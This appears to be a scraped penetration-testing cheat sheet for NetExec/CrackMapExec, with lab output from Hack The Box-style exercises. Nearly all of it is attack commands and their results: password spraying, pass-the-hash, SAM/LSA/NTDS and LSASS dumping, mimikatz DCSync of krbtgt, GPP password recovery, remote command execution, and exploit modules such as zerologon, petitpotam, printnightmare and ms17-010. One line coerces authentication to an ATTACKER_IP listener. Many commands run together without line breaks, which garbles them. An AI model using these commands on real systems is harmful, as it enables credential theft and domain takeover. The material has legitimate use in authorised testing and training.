NetExec - CME
Last updated
Last updated
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)nxc ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sidnxc ldap IP_RANGE -u username -p password -M obsolete[Apr 08, 2024 - 02:26:06 (EDT)] exegol-CPTS /workspace # nxc smb "10.129.201.97" -u '' -p '' -M ms17-010
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
SMB 10.129.201.97 445 SHELLS-WINBLUE [*] Windows Server 2016 Standard 14393 x64 (name:SHELLS-WINBLUE) (domain:SHELLS-WINBLUE) (signing:False) (SMBv1:True)
SMB 10.129.201.97 445 SHELLS-WINBLUE [+] SHELLS-WINBLUE\:
MS17-010 [+] 10.129.201.97 is likely VULNERABLE to MS17-010! (Windows Server 2016 Standard 14393)nxc smb IP_RANGE -u username -p password -M printerbug -o LISTENER=ATTACKER_IPcrackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-polcrackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-successcme smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce --continue-on-success$ crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares
SMB 10.129.42.197 445 WINSRV [*] Windows 10.0 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB 10.129.42.197 445 WINSRV [+] WINSRV\user:password
SMB 10.129.42.197 445 WINSRV [+] Enumerated shares
SMB 10.129.42.197 445 WINSRV Share Permissions Remark
SMB 10.129.42.197 445 WINSRV ----- ----------- ------
SMB 10.129.42.197 445 WINSRV ADMIN$ Remote Admin
SMB 10.129.42.197 445 WINSRV C$ Default share
SMB 10.129.42.197 445 WINSRV SHARENAME READ,WRITE
SMB 10.129.42.197 445 WINSRV IPC$ READ Remote IPCnxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-usersnxc smb IP -u username -p password -M reg-winlogon--qwinsta: Enumerate active sessions on the target, including numerous useful information
--tasklist: Enumerates all running tasks on the hostnxc smb 10.129.202.85 -u jmarston -p 'P@ssword!' -M gpp_password$ crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [+] Found SYSVOL share
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [*] Searching for Registry.xml
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [*] Found INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [+] Found credentials in INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Usernames: ['guarddesk']
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Domains: ['INLANEFREIGHT.LOCAL']
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Passwords: ['ILFreightguardadmin!']You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --samcrackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --samYou need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsaIf you found an account starting with SC_GMSA{84A78B8C-56EE-465b-8496-FFB35A1B52A7} you can get the account behind:
nxc ldap <ip> -u <user> -p <pass> --gmsa-decrypt-lsa '_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_313e25a880eb773502f03ad5021f49c2eb5b5be2a09f9883ae0d83308dbfa724:01000000240200001000120114021c02fbb096d10991bb88c3f54e153807b4c1cc009d30bc3c5<---SNIP--->cd88f866c12160313f9e6884b510840e90f4c5ee5a032d40000f0650a4489170000f0073a9188170000'nxc smb 192.168.255.131 -u administrator -p pass -M lsassynxc smb 192.168.255.131 -u administrator -p pass -M nanodumpnxc smb 192.168.255.131 -u administrator -p pass -M mimikatznxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"SMB Module handlekatz: [*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz
SMB module procdump: [*] procdump Get lsass dump using procdump64 and parse the result with pypykatz
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' -M ntdsutil#~ nxc smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
#~ nxc smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
#~ nxc smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
#~ nxc smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)[Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\'
SMB 10.129.202.136 445 WINSRV [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM 10.129.202.136 5985 WINSRV [+] WINSRV\john:november (admin)
WINRM 10.129.202.136 5985 WINSRV [+] Executed command (shell type: powershell)
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Directory: C:\
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Mode LastWriteTime Length Name
WINRM 10.129.202.136 5985 WINSRV ---- ------------- ------ ----
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM PerfLogs
WINRM 10.129.202.136 5985 WINSRV d-r--- 12/14/2020 6:38 PM Program Files
WINRM 10.129.202.136 5985 WINSRV d----- 2/11/2022 6:10 AM Program Files (x86)
WINRM 10.129.202.136 5985 WINSRV d-r--- 1/6/2022 6:49 AM Users
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM Windows
WINRM 10.129.202.136 5985 WINSRV
[Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace # nxc ssh 10.129.245.201 -u sam -p mut_password.listTo enumerate all users via LDAP:
nxc ldap $ip -u $user -p $password --usersTo enumerate just the active users via LDAP:
nxc ldap $ip -u $user -p $password --active-usersnxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M spooler -M printnightmare -M shadowcoerce -M petitpotamnxc smb <ip> -u '' -p '' -M zerologonnxc smb <ip> -u '' -p '' -M petitpotamnxc smb <ip> -u 'user' -p 'pass' -M nopacSource:
Source:
